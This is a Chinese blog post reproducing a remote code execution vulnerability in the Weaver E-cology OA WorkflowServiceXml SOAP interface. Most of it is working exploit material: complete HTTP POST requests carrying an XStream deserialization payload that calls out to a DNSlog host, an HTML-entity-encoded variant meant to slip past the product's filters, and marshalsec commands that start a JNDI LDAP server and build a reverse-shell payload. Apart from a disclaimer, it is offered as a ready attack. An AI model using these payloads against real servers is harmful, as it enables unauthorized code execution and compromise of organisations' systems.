美文网首页
x微E-Cology WorkflowServiceXml RC

x微E-Cology WorkflowServiceXml RC

作者: thelostworldSec | 来源:发表于2021-05-16 20:55 被阅读0次

x微E-Cology WorkflowServiceXml RCE

一、漏洞描述

泛微E-cology OA系统的WorkflowServiceXml接口可被未授权访问,攻击者调用该接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程代码执行。

二、漏洞影响

E-cology <= 9.0

三、漏洞复现

访问主页:

POC:

POST /services%20/WorkflowServiceXml HTTP/1.1Accept-Encoding: gzip, deflateContent-Type: text/xml;charset=UTF-8SOAPAction: ""Content-Length: 10994Host: xxxUser-Agent: Apache-HttpClient/4.1.1 (java 1.5)Connection: close<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">   <soapenv:Header/>   <soapenv:Body>      <web:doCreateWorkflowRequest>.      <web:string>        <map>          <entry>            <url>http://thelostworld.dnslog.cn</url>            <string>http://thelostworld.dnslog.cn</string>          </entry>        </map>        </web:string>        <web:string>2</web:string>.      </web:doCreateWorkflowRequest>   </soapenv:Body></soapenv:Envelope>

编码:

POST /services%20/WorkflowServiceXml HTTP/1.1Accept-Encoding: gzip, deflateContent-Type: text/xml;charset=UTF-8SOAPAction: ""Content-Length: 10994Host: xxxUser-Agent: Apache-HttpClient/4.1.1 (java 1.5)Connection: close<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">   <soapenv:Header/>   <soapenv:Body>.      <web:doCreateWorkflowRequest>      <web:string>        &lt;&#109;&#97;&#112;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#101;&#110;&#116;&#114;&#121;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#117;&#114;&#108;&gt;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#116;&#104;&#101;&#108;&#111;&#115;&#116;&#119;&#111;&#114;&#108;&#100;&#46;&#100;&#110;&#115;&#108;&#111;&#103;&#46;&#99;&#110;&lt;&#47;&#117;&#114;&#108;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#115;&#116;&#114;&#105;&#110;&#103;&gt;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#116;&#104;&#101;&#108;&#111;&#115;&#116;&#119;&#111;&#114;&#108;&#100;&#46;&#100;&#110;&#115;&#108;&#111;&#103;&#46;&#99;&#110;&lt;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#47;&#101;&#110;&#116;&#114;&#121;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#47;&#109;&#97;&#112;&gt;        </web:string>.        <web:string>2</web:string>      </web:doCreateWorkflowRequest>   </soapenv:Body></soapenv:Envelope>

或者直接:

利用 marshalsec 生成反弹shell  payload

启动 jndi :ldap服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8888/#Exploit

生存poc:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.XStream CommonsBeanutils ldap://127.0.0.1:1389/Exploit > payload.xml

DNSlog:

执行命令

参考:

https://mp.weixin.qq.com/s/-eTSGvjuygGxULHcw6lOMg

http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEE-Cology%20WorkflowServiceXml%20RCE.html?h=%E6%B3%9B%E5%BE%AEE-Cology%20WorkflowServiceXml%20RCE

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

如果本文内容侵权或者对贵公司业务或者其他有影响,请联系作者删除。

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

相关文章

网友评论

      本文标题:x微E-Cology WorkflowServiceXml RC

      本文链接:https://www.haomeiwen.com/subject/hairjltx.html